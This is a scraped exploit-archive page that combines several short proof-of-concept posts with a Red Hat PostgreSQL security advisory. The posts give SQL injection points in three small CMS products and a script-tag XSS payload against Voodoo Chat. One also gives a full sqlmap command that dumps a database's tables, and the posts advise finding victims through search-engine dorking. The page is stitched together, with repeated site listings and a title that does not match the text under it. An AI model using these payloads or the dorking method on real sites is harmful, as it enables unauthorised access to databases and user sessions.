Red Hat Security Advisory 2023-4535-01

Virtues cpanelCMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Virtues cpanelCMS v1.0 sql injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.virtues.ag/                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index/noticia_integra.php?id_clipping=[+] http://wospluralorg/index/noticia_integra.php?id_clipping= inject herGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Virtues cpanelCMS 1.0 SQL Injection

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

Red Hat Security Advisory 2023-4527-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:13 security update  
Advisory ID:       RHSA-2023:4527-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4527  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:13 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.src.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.src.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.aarch64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.aarch64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.11-1.module+el8.8.0+19081+0a277c66.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.ppc64le.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.s390x.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11357+bcc62552.x86_64.rpm  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-contrib-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-debugsource-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-docs-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plperl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-plpython3-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-pltcl-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-server-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-static-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-test-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.11-1.module+el8.8.0+19081+0a277c66.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k8pAAoJENzjgjWX9erE+eYQAJRHA0QdZv5xV9TWliWdsitH  
6tP5HpsBibR5c1ZZTYGULESqi1fiiDa2qD9rvT0bY+17LdhfSofd57OqUT+SCI1g  
AQ5umKalGbrpvNQ86FJ90UjTpASSdP3cCrdZ8cvJbyNgvjE+pQmkH4rJUxz1PD1j  
6dI+TLEsRSspOADDeuDESuLEwV6IYezmraPoLFyNr6+fE8Byfldf7tTFqu0PT8pD  
edQiQqRfbRSK2MiVQPWFdBlfHbLLUzzMl+IYIyCWDGdAglsnqOQqQUyGoH1b+gKd  
O/TauZ8kV1t9KlJSdo5GJFWrY6nULBunrB3uRWEi7iV+WtqF1oc/42HhcZ+PDKFd  
H/uDTAek+QiCuKJqpnGnwDf+gTUQupvlSN6+1hHSr/VN0j4IL1s0CJ6n1DIXj4Wv  
ewHllUnsUzstH6fA/tDOx31MBsEUPgb3HNagHjuwNf+kBeGAVDFWTaMlk082NgX5  
5fa2PrgpqQQQ6fvwBypoPhiqlnuevJW+FRSyqPNcSGg0b1o7BGbNqsXQG7mPKikt  
e7HpJ/9IHDMHXJG4jI3Dz4xe17xFSC9P+YWGeRHrVpoEe4ad6N0+uCYFBztaUAuv  
NCKdrDr8pTeZObDQbZ/zozirUQINLOlZW28gfHCVX3B6XD4v/NgD08PPcWziepjZ  
Bb739FMpHL9bwdagWyGU  
=+g0V  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4527-01

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 SQL Injection

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Digital Ant E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 11.



Tag

#sql